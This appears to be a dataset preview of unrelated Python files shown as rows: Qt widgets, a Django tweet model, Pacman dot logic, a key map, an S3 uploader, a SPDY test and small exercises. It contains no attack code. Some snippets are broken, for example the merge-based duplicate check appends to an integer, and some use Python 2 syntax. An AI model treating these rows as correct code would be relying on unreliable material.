def _create_widgets(self):
pass
def _create_layout(self):
pass
def setModel(self, model):
self.model = model
self._data_mapper.setModel(self.model)
# self.map_to_index()
def add_mappings(self):
pass
# self.data_mapper.toFirst()
def setSelection(self, index):
if not index.isValid():
self.clear()
return
if not self._mapped:
self.add_mappings()
self._mapped = True
self._data_mapper.setRootIndex(index.parent())
self._data_mapper.setCurrentModelIndex(index)
def clear(self):
self._data_mapper.clearMapping()
self._mapped = False
self.clear_widgets()
def clear_widgets(self):
pass
def get_current_index(self):
parent_index = self._data_mapper.rootIndex()
row = self._data_mapper.currentIndex()
index = self.model.index(row, 0, parent_index)
return index
class BfObjectNameWidget(BfMappedWidget):
"""Stuff
TODO if index is not editable, set line edit to be not editable.
"""
def __init__(self, parent=None):
super(BfObjectNameWidget, self).__init__(parent)
def _create_widgets(self):
self._label = QtWidgets.QLabel("Name")
self._line_edit = QtWidgets.QLineEdit()
self._label.setFixedWidth(DEFAULT_LABEL_WIDTH)
self._line_edit.setEnabled(False)
def _create_layout(self):
self.lyt = QtWidgets.QHBoxLayout()
self.lyt.setContentsMargins(0, 0, 0, 0)
# self.lyt.setSpacing(5)
self.lyt.addWidget(self._label)
self.lyt.addWidget(self._line_edit)
self.setLayout(self.lyt)
def add_mappings(self):
self._line_edit.setEnabled(True)
self._data_mapper.addMapping(self._line_edit, 0)
self._data_mapper.toFirst()
def clear_widgets(self):
self._line_edit.setText("")
self._line_edit.setEnabled(False)
class BfObjectTypeWidget(BfMappedWidget):
"""Stuff"""
def __init__(self, parent=None):
super(BfObjectTypeWidget, self).__init__(parent)
def _create_widgets(self):
self.type_label = QtWidgets.QLabel("Type")
self.pixmap_label = QtWidgets.QLabel()
self.text_label = QtWidgets.QLabel()
self.type_label.setFixedWidth(DEFAULT_LABEL_WIDTH)
self.pixmap_label.setFixedWidth(20)
def _create_layout(self):
self.lyt = QtWidgets.QHBoxLayout()
self.lyt.setContentsMargins(0, 0, 0, 0)
# self.lyt.setSpacing(5)
self.lyt.addWidget(self.type_label)
self.lyt.addWidget(self.pixmap_label)
self.lyt.addWidget(self.text_label)
self.setLayout(self.lyt)
def add_mappings(self):
self._data_mapper.addMapping(self.pixmap_label, 2, "pixmap")
self._data_mapper.addMapping(self.text_label, 1, "text")
def clear_widgets(self):
self.text_label.setText("")
self.pixmap_label.setPixmap(None)
|
# encoding: utf-8
#@author: newdream_daliu QQ:279129436
#@file: __init__.py.py
#@time: 2021-05-06 16:01
#@desc:
|
#!usr/bin/env python
# -*- coding:utf-8 -*-
"""
@author:nieh
@file: main.py
@time: 2018/03/26
"""
from __future__ import division
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import f_classif
from sklearn import preprocessing
from utils.utils import *
from Features import Feature
import os
import numpy as np
import warnings
import sklearn.exceptions
warnings.filterwarnings('ignore', category=sklearn.exceptions.UndefinedMetricWarning)
warnings.filterwarnings('ignore', category=DeprecationWarning)
if __name__ == "__main__":
path = '/home1/nh/projects/Readability_v2/data/fine_grained/renjiaoban' # 存放语料库的路径
word_dict, char_dict, stroke_dict = construct_dict()
feature = Feature(word_dict, char_dict, stroke_dict, path)
if not os.path.exists('npy/fine_grained/rjb'):
os.makedirs('npy/fine_grained/rjb')
os.chdir('npy/fine_grained/rjb')
if os.path.exists('X_ltp.npy') and os.path.exists('Y_ltp.npy'):
print('分词模式:ltp segmentor')
X = np.load('X_ltp.npy')
Y = np.load('Y_ltp.npy')
print('dataset loaded successfully!')
else:
feature.save_dataset()
print('分词模式:ltp segmentor')
X = np.load('X_ltp.npy')
Y = np.load('Y_ltp.npy')
print('dataset loaded successfully!')
os.chdir('../../../')
# 统计数据集中各类别的样本数目
target_list = Y.tolist()
u_target = set(target_list)
for grade in u_target:
print(grade, target_list.count(grade))
min_max_scaler = preprocessing.MinMaxScaler()
X_scaled = min_max_scaler.fit_transform(X)
selector = SelectKBest(f_classif, k=10)
selector.fit(X_scaled, Y)
print selector.scores_ |
from django.db import models
from users.models import UserAccount
# Create your models here.
class Tweet(models.Model):
user_id = models.ForeignKey(UserAccount, on_delete=models.CASCADE, related_name='tweets')
content = models.CharField(max_length=5000)
image = models.CharField(max_length=1000, default='', blank=True)
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.content
class Meta:
ordering = ['-created_at'] |
from dot import Dot
class Dots:
"""A collection of dots."""
def __init__(self, WIDTH, HEIGHT,
LEFT_VERT, RIGHT_VERT,
TOP_HORIZ, BOTTOM_HORIZ):
self.WIDTH = WIDTH
self.HEIGHT = HEIGHT
self.TH = TOP_HORIZ
self.BH = BOTTOM_HORIZ
self.LV = LEFT_VERT
self.RV = RIGHT_VERT
self.SPACING = 75
self.EAT_DIST = 57 # changed for pacman to eat dots on the verges
# Initialize four rows of dots, based on spacing and width of the maze
self.top_row = [Dot(self.SPACING * i, self.TH)
for i in range(self.WIDTH//self.SPACING + 1)]
self.bottom_row = [Dot(self.SPACING * i, self.BH)
for i in range(self.WIDTH//self.SPACING + 1)]
self.left_col = [Dot(self.LV, self.SPACING * i)
for i in range(self.HEIGHT//self.SPACING + 1)]
self.right_col = [Dot(self.RV, self.SPACING * i)
for i in range(self.HEIGHT//self.SPACING + 1)]
def display(self):
"""Calls each dot's display method"""
for i in range(0, len(self.top_row)):
self.top_row[i].display()
for i in range(0, len(self.bottom_row)):
self.bottom_row[i].display()
for i in range(0, len(self.left_col)):
self.left_col[i].display()
for i in range(0, len(self.right_col)):
self.right_col[i].display()
def eat(self, pac_x, pac_y):
'''let pacman eat the dot when encounters in all four dot rows'''
dots_to_del_top = []
dots_to_del_bottom = []
dots_to_del_left = []
dots_to_del_right = []
# top row
for dot in self.top_row:
if abs(dot.x - pac_x) < self.EAT_DIST and \
abs(dot.y - pac_y) < self.EAT_DIST:
dots_to_del_top.append(dot)
while dots_to_del_top:
# make sure every dot is deleted
dot = dots_to_del_top.pop()
self.top_row.remove(dot)
# bottom row
for dot in self.bottom_row:
if abs(dot.x - pac_x) < self.EAT_DIST and \
abs(dot.y - pac_y) < self.EAT_DIST:
dots_to_del_bottom.append(dot)
while dots_to_del_bottom:
dot = dots_to_del_bottom.pop()
self.bottom_row.remove(dot)
# left column
for dot in self.left_col:
if abs(dot.x - pac_x) < self.EAT_DIST and \
abs(dot.y - pac_y) < self.EAT_DIST:
dots_to_del_left.append(dot)
while dots_to_del_left:
dot = dots_to_del_left.pop()
self.left_col.remove(dot)
# right column
for dot in self.right_col:
if abs(dot.x - pac_x) < self.EAT_DIST and \
abs(dot.y - pac_y) < self.EAT_DIST:
dots_to_del_right.append(dot)
while dots_to_del_right:
dot = dots_to_del_right.pop()
self.right_col.remove(dot)
def dots_left(self):
"""Returns the number of remaing dots in the collection"""
return (len(self.top_row) +
len(self.bottom_row) +
len(self.left_col) +
len(self.right_col))
|
## Mail Server details
MAIL_SERVER='smtp.gmail.com'
MAIL_PORT = 465
MAIL_USERNAME = 'account_id@gmail.com'
MAIL_PASSWORD = 'password'
MAIL_USE_TLS = False
MAIL_USE_SSL = True
MAIL_SENDER_EMAIL = ''
MAIL_RECEIVER_EMAIL = ''
ETHERSCAN_API_KEY = ''
ETH_WALLET_ADDRESS = ''
WEI_DIVIDER = 1000000000000000000 |
from keyboardlayout.key import Key
KEY_MAP = {
96: Key.BACKQUOTE,
126: Key.ASCII_TILDE,
49: Key.DIGIT_1,
33: Key.EXCLAMATION,
50: Key.DIGIT_2,
64: Key.AT,
51: Key.DIGIT_3,
35: Key.NUMBER,
52: Key.DIGIT_4,
36: Key.DOLLAR,
53: Key.DIGIT_5,
37: Key.PERCENT,
54: Key.DIGIT_6,
94: Key.CIRCUMFLEX,
55: Key.DIGIT_7,
38: Key.AMPERSAND,
56: Key.DIGIT_8,
42: Key.ASTERISK,
57: Key.DIGIT_9,
40: Key.LEFTPAREN,
48: Key.DIGIT_0,
41: Key.RIGHTPAREN,
45: Key.MINUS,
43: Key.PLUS,
61: Key.EQUALS,
65288: Key.BACKSPACE,
65289: Key.TAB,
113: Key.Q,
81: Key.Q_UPPER,
119: Key.W,
87: Key.W_UPPER,
101: Key.E,
69: Key.E_UPPER,
114: Key.R,
82: Key.R_UPPER,
116: Key.T,
84: Key.T_UPPER,
121: Key.Y,
89: Key.Y_UPPER,
117: Key.U,
85: Key.U_UPPER,
105: Key.I,
73: Key.I_UPPER,
111: Key.O,
79: Key.O_UPPER,
112: Key.P,
80: Key.P_UPPER,
91: Key.LEFTBRACKET,
123: Key.BRACELEFT,
93: Key.RIGHTBRACKET,
125: Key.BRACERIGHT,
92: Key.BACKSLASH,
124: Key.PIPE,
65509: Key.CAPSLOCK,
65792: Key.CAPSLOCK, # MACOS
97: Key.A,
65: Key.A_UPPER,
115: Key.S,
83: Key.S_UPPER,
100: Key.D,
68: Key.D_UPPER,
102: Key.F,
70: Key.F_UPPER,
103: Key.G,
71: Key.G_UPPER,
104: Key.H,
72: Key.H_UPPER,
106: Key.J,
74: Key.J_UPPER,
107: Key.K,
75: Key.K_UPPER,
108: Key.L,
76: Key.L_UPPER,
59: Key.SEMICOLON,
58: Key.COLON,
39: Key.SINGLEQUOTE,
34: Key.DOUBLEQUOTE,
65293: Key.RETURN,
131074: Key.LEFT_SHIFT, # macOs
131330: Key.LEFT_SHIFT, # macOs
65505: Key.LEFT_SHIFT,
122: Key.Z,
90: Key.Z_UPPER,
120: Key.X,
88: Key.X_UPPER,
99: Key.C,
67: Key.C_UPPER,
118: Key.V,
86: Key.V_UPPER,
98: Key.B,
66: Key.B_UPPER,
110: Key.N,
78: Key.N_UPPER,
109: Key.M,
77: Key.M_UPPER,
44: Key.COMMA,
60: Key.LESSTHAN,
46: Key.PERIOD,
62: Key.GREATERTHAN,
47: Key.FORWARDSLASH,
63: Key.QUESTION,
131076: Key.RIGHT_SHIFT, # macOs
65506: Key.RIGHT_SHIFT,
262145: Key.LEFT_CONTROL, # macOs
65507: Key.LEFT_CONTROL,
1048584: Key.LEFT_META, # macOs
65511: Key.LEFT_META,
524320: Key.LEFT_ALT, # macOs
65513: Key.LEFT_ALT,
32: Key.SPACE,
524352: Key.RIGHT_ALT, # macOs
65514: Key.RIGHT_ALT,
1048592: Key.RIGHT_META, # macOs
65512: Key.RIGHT_META,
7208976: Key.CONTEXT_MENU, # macOs
1073741925: Key.CONTEXT_MENU,
270336: Key.RIGHT_CONTROL,
65508: Key.RIGHT_CONTROL, # macOs
65362: Key.UP_ARROW,
65364: Key.DOWN_ARROW,
65361: Key.LEFT_ARROW,
65363: Key.RIGHT_ARROW,
# azerty
249: Key.U_GRAVE,
2812: Key.CARET,
233: Key.E_ACUTE,
45: Key.MINUS,
232: Key.E_GRAVE,
95: Key.UNDERSCORE,
231: Key.C_CEDILLE,
224: Key.A_GRAVE,
61: Key.EQUALS,
176: Key.DEGREE,
168: Key.DIACRATICAL,
163: Key.POUND,
226: Key.A, # A_CIRCUMFLEX
234: Key.E, # E_CIRCUMFLEX
238: Key.I, # I_CIRCUMFLEX
244: Key.O, # O_CIRCUMFLEX
251: Key.U, # U_CIRCUMFLEX
167: Key.SECTION,
}
|
arr = list(map(int, input().split(' ')))
for idx, _ in enumerate(arr):
midx = idx
while midx > 0 and arr[midx] < arr[midx - 1]:
arr[midx], arr[midx - 1] = arr[midx - 1], arr[midx]
midx -= 1
for i in arr:
print(i, end=' ') |
S = input().replace('x', '')
print(700 + 100*len(S))
|
from bot import Bot
email = ''
password = ''
product_codes = ['B01545GQ9O', 'B016DCAOZY', 'B07MJKHYDC', 'B016DCAOOA',
'B07571223K', 'B077ZC9D8R', 'B00EP56O0G', 'B07VBM91JB',
'B07YY9ZD7M', 'B07T3MNKKW', 'B008WX2OY2', 'B07T5V4TCV',
'B01613I79K', 'B07VYRQZ69', 'B0015R1BL4', 'B074V8TCMY',
'B07VYRQZ69', 'B00FX4EBS0', 'B07YY9T1FQ']
if __name__ == '__main__':
for product_code in product_codes:
Bot(product_code, email, password).start()
|
#! /usr/bin/env python
"""
multipart-upload.
Upload large files (2+ GB) in multiple parts.
"""
if __name__ == '__main__':
import argparse as ap
import boto
import math
import os
import sys
from filechunkio import FileChunkIO
from aws_keys import AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY
parser = ap.ArgumentParser(
prog='multipart-upload',
conflict_handler='resolve',
description='Upload large files (2+ GB) in multiple parts.')
group1 = parser.add_argument_group('Options', '')
group1.add_argument('--file', metavar="STR", type=str, required=True,
help='File to upload.')
group1.add_argument('--bucket', metavar="STR", type=str, required=True,
help='Bucket to upload file to.')
group1.add_argument('--bucket_path', metavar="STR", type=str,
help='Specific path in bucket. (Default: /)',
default="")
group1.add_argument('--chunk_size', metavar="INT", type=int,
help='Size of chunks (in MB) to upload. (Default: 50)',
default=50)
group1.add_argument('-h', '--help', action='help',
help='Show this help message and exit')
if len(sys.argv) == 1:
parser.print_usage()
sys.exit(1)
args = parser.parse_args()
conn = boto.connect_s3(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY)
bucket = conn.get_bucket(args.bucket)
# File info
file = args.file
file_size = os.stat(file).st_size
# Create a multipart upload request
mp = bucket.initiate_multipart_upload("{0}/{1}".format(
args.bucket_path,
os.path.basename(file)
))
chunk_size = args.chunk_size * 1048576
chunk_count = int(math.ceil(file_size / chunk_size))
# Upload file
print "Uploading {0} to '{1}/{2}'".format(
file,
args.bucket,
args.bucket_path
)
for i in range(chunk_count + 1):
print "Uploading chunk {0} of {1}...".format(i + 1, chunk_count + 1)
offset = chunk_size * i
bytes = min(chunk_size, file_size - offset)
with FileChunkIO(file, 'r', offset=offset, bytes=bytes) as fp:
mp.upload_part_from_file(fp, part_num=i + 1)
# Finish the upload
print "Upload completed."
mp.complete_upload()
|
toque = (51 % 24) + 2
print(toque) |
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
if __name__ == "__main__":
monthstep = relativedelta(months=1)
count = 0
date = datetime(1901, 1, 1)
while date < datetime(2000, 12, 31):
date += monthstep
if date.weekday() == 6:
count += 1
print(count)
|
from django.urls import include, path
from . import views
urlpatterns = [
path('', views.ListPassword.as_view()),
path('<int:id>/', views.DetailPassword.as_view()),
path('rest-auth/', include('rest_auth.urls')),
] |
#!/usr/bin/env python
"""Remove miscellaneous expired things (Credentials, CachedFeeds, Loans, etc.)
from the database.
"""
import os
import sys
bin_dir = os.path.split(__file__)[0]
package_dir = os.path.join(bin_dir, "..")
sys.path.append(os.path.abspath(package_dir))
from core.scripts import RunReaperMonitorsScript
RunReaperMonitorsScript().run()
|
from Pages.ContentPages.BasePage import Page
from selenium.webdriver.common.by import By
from magic_box.find_elements import find_element
class AddContentPage(Page):
def __init__(self, driver):
self.driver = driver
self.locators = {
'landing_add_button': {'by': By.XPATH, 'value': 'id("block-mainpagecontent")/ul[1]/li[1]/a[1]'},
'page_add_button': {'by': By.XPATH, 'value': '//a[@href="/node/add/page"]'},
'press_release_add_button': {'by': By.XPATH, 'value': 'id("block-mainpagecontent")/ul[1]/li[1]/a[3]'},
'webform_add_button': {'by': By.XPATH, 'value': 'id("block-mainpagecontent")/ul[1]/li[1]/a[4]'},
'solution_add_button': {'by': By.XPATH, 'value': '//a[@href="/node/add/solution"]'},
}
def get_landing_add_button(self):
landing_add_button = self.driver.find_element(**self.locators['landing_add_button'])
return landing_add_button
def get_page_add_button(self):
page_add_button = self.driver.find_element(**self.locators['page_add_button'])
return page_add_button
def get_press_release_add_button(self):
press_release_add_button = self.driver.find_element(**self.locators['press_release_add_button'])
return press_release_add_button
def get_webform_add_button(self):
webform_add_button = self.driver.find_element(**self.locators['webform_add_button'])
return webform_add_button
def get_solution_add_button(self):
solution_add_button = find_element(self.driver, **self.locators['solution_add_button'])
return solution_add_button
|
from twisted.trial.unittest import TestCase
from twisted.test import proto_helpers
from twisted.internet.protocol import ClientFactory
from .. import spdy_headers, c_zlib
example_headers = "8\xea\xdf\xa2Q\xb2b\xe0f`\x83\xa4\x17\x06{\xb8\x0bu0,\xd6\xae@\x17\xcd\xcd\xb1.\xb45\xd0\xb3\xd4\xd1\xd2\xd7\x02\xb3,\x18\xf8Ps,\x83\x9cg\xb0?\xd4=:`\x07\x81\xd5\x99\xeb@\xd4\x1b3\xf0\xa3\xe5i\x06A\x90\x8bu\xa0N\xd6)NI\xce\x80\xab\x81%\x03\x06\xbe\xd4<\xdd\xd0`\x9d\xd4<\xa8\xa5\xbc(\x89\x8d\x81\x13\x1a$\xb6\x06\x0c,\xa0\xdc\xcf \x95\x9b\x9a\x92\x99\x98\x04LvyUz\xb9\x89\xc5\xd9\x99z\xf9E\xe9V\x96\x06\x06\x06\x0cl\xb9\xc0\x12(?\x85\x81\xd9\xdd5\x84\x81\xad\x18hNn*\x03kFI\t@\x05\xc5\x0c\xcc\xa0\xd0a\xd4g\xe0Bdi\x862\xdf\xfc\xaa\xcc\x9c\x9cD}S=\x03\x05\r\xdf\xc4\xe4\xcc\xbc\x92\xfc\xe2\x0ck\x05O`*\xcbQ\x00\n(\xf8\x07+D(\x18\x1a\xc4\x9b\xc5[h*8\x02\x03,5<5\xc9;\xb3D\xdf\xd4\xd8T\xcf\xd0PA\xc3\xdb#\xc4\xd7GG!'3;U\xc1=59;_S\xc19\x03XT\xa5\xea\x1b\x9a\xeb\x01\xc3\xd3\xccX\xcf\xc4L!81-\xb1(\x13\xaa\x89\x81\x1d\x1aa\x0c\x1c\xb0x\x04\x00\x00\x00\xff\xff"
class SpdyHeaderTest(TestCase):
def testSampleHeaders(self):
headers = spdy_headers.SpdyHeaders(example_headers)
self.assertEqual(['en-US,en;q=0.8'], headers.getRawHeaders('accept-language'))
def testRoundTrip(self):
headers = spdy_headers.SpdyHeaders(example_headers)
decompressedHeaders = c_zlib.decompress(example_headers, dictionary=spdy_headers.dictionary)
self.assertEqual(decompressedHeaders, headers.asBinary(compressed=False))
|
a, b = input().split(' ')
a = int(a)
b = int(b)
if a >= 0:
if b > 0:
print(a // b)
print(a % b)
else:
b = -b
print( -(a // b))
print(a % b)
else:
if b > 0:
print(a // b)
a -= b
print(a % b)
else:
a += b
print(a // b)
print((a- b) - (a//b) * b)
|
from gym_do_not_repeat_yourself.envs.do_not_repeat_yourself_env import DoNotRepeatYourselfEnv
|
__author__ = 'Julia'
import sys
b = 0
A = []
k = 0
for line in sys.stdin:
if line == 0:
for word in line.strip().split():
k.append(int(word))
for word in line.strip().split():
A.append(int(word))
def merge(a, c):
global b
l = len(a)
if l == 1:
return a
a1 = merge(a[:l//2], c)
a2 = merge(a[l//2:], c)
a_sort = []
index1, index2 = 0, 0
while index1 < len(a1) and index2 < len(a2):
if a1[index1] >= a2[index2]:
if (a1[index1]-a2[index2]) < c:
b = 1
a_sort.append(a2[index2])
index2 += 1
else:
if (a2[index2]-a1[index1]) < c:
b = 1
a_sort.append(a1[index1])
index1 += 1
if index1 < len(a1):
a_sort.extend(a1[index1:])
else:
a_sort.extend(a2[index2:])
return a_sort
def check_duplicate(a, c):
merge(a, c)
if b == 0:
return True
else:
return False
check_duplicate(A, k) |
from intent_handling.intents.PrereqsForClassIntent import PrereqsForClassIntent
class ClassRequiresStandingIntent:
NAME = 'CLASS_REQ_STANDING'
def __init__(self, parameters):
self.parameters = parameters
def execute(self, db):
return PrereqsForClassIntent(self.parameters).execute(db)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.